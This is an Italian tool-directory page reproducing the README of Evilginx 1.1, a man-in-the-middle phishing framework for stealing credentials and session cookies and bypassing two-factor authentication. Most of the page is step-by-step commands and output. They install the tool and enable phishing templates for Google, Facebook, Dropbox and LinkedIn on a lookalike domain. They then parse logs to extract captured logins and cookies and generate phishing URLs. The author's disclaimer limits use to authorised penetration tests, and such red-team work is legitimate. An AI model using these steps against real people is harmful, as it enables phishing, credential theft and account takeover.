Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
evilginx — UTILIZZA LA NUOVA VERSIONE: https://github.com/kgretzky/evilginx2 | Kitploit
Strumenti/GitHubGitHub/kgretzky/evilginx
Strumenti di PhishingSfruttamento di Applicazioni WebPhishingPenetration TestingIngegneria SocialeAutenticazioneRed Teaming
GitHubkgretzky/evilginx

evilginx

UTILIZZA LA NUOVA VERSIONE: https://github.com/kgretzky/evilginx2

Vedi Repository
1.2k2818 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Evilginx v.1.1.0

Evilginx

QUESTA VERSIONE È OBSOLETA. USA L'ULTIMA VERSIONE!

EVILGINX 2: https://github.com/kgretzky/evilginx2

Evilginx è un framework per attacchi man-in-the-middle utilizzato per il phishing di credenziali e cookie di sessione di qualsiasi servizio web. Il suo core gira sul server HTTP Nginx, che utilizza proxy_pass e sub_filter per inoltrare e modificare il contenuto HTTP, intercettando il traffico tra client e server.

Puoi imparare come funziona e come installare tutto da solo sul mio blog:

Primo post leggermente obsoleto ora: Evilginx - Phishing Avanzato con Bypass dell'Autenticazione a Due Fattori

Aggiornamento Evilginx 1.0: Evilginx 1.0 Update - Alza il Tuo Livello nel Phishing 2FA

Aggiornamento Evilginx 1.1: Evilginx 1.1 Update

Avvertenza

Sono consapevole che Evilginx possa essere utilizzato per scopi molto malvagi. Questo lavoro è semplicemente una dimostrazione di ciò che gli attaccanti esperti possono fare. È responsabilità del difensore prendere in considerazione tali attacchi quando si impostano le difese e trovare modi per proteggersi da questo metodo di phishing. Evilginx dovrebbe essere utilizzato solo in incarichi legittimi di penetration testing con autorizzazione scritta da parte delle vittime del phishing.

Hall of Fame dei Collaboratori

@poweroftrue

Installazione

Evilginx fornisce uno script di installazione install.sh che si occupa di installare l'intero pacchetto su qualsiasi macchina Debian wheezy/jessie, in modalità fire and forget.

root@kitploit:~
git clone https://github.com/kgretzky/evilginx
cd evilginx
chmod 700 install.sh
./install.sh

Utilizzo

root@kitploit:~
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/          v1.0

usage: evilginx.py [-h] {setup,parse,genurl} ...

positional arguments:
  {setup,parse,genurl}
    setup               Configure Evilginx.
    parse               Parse log file(s).
    genurl              Generate phishing URL.

optional arguments:
  -h, --help            show this help message and exit
Setup

Abilita o disabilita le configurazioni dei siti da utilizzare con il server Nginx, usando i template Evilginx forniti dalla directory sites.

root@kitploit:~
usage: evilginx.py setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Your phishing domain.
  -y                    Answer all questions with 'Yes'.
  -l, --list            List available supported apps.
  --enable ENABLE       Enable following site by name.
  --disable DISABLE     Disable following site by name.

Elenca i modelli di configurazione dei siti disponibili:

root@kitploit:~
python evilginx.py setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

Abilita il sito di phishing google con il dominio preregistrato not-really-google.com:

root@kitploit:~
python evilginx.py setup --enable google -d not-really-google.com

Disabilita il sito di phishing facebook:

root@kitploit:~
python evilginx.py setup --disable facebook
Parse

Analizza i log di Nginx per estrarre le credenziali di login e i cookie di sessione intercettati. I log, per impostazione predefinita, vengono salvati nella directory logs, dove risiede lo script evilginx.py. Questo può essere fatto automaticamente dopo aver abilitato l'analisi automatica nella fase di Setup.

root@kitploit:~
usage: evilginx.py parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs
                        for all sites).
  --debug               Does not truncate log file after parsing.

Analizza i log solo per il sito google:

root@kitploit:~
python evilginx.py parse -s google

Analizza i log per tutti i siti disponibili:

root@kitploit:~
python evilginx.py parse -s all
Genera URL

Genera URL di phishing che puoi utilizzare nei tuoi Red Team Assessments.

root@kitploit:~
usage: evilginx.py genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to generate link for.
  -r REDIRECT, --redirect REDIRECT
                        Redirect user to this URL after successful sign-in.

Genera un URL di phishing per google che reindirizzerà la vittima al video di rickroll dopo un login riuscito:

root@kitploit:~
python evilginx.py genurl -s google -r https://www.youtube.com/watch?v=dQw4w9WgXcQ

Generated following phishing URLs:

 : https://accounts.not-really-google.com/ServiceLogin?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
 : https://accounts.not-really-google.com/signin/v2/identifier?rc=0aHR0cHM6Ly93d3cueW91dHViZS5jb20vd2F0Y2g_dj1kUXc0dzlXZ1hjUQ
Scarica lo strumento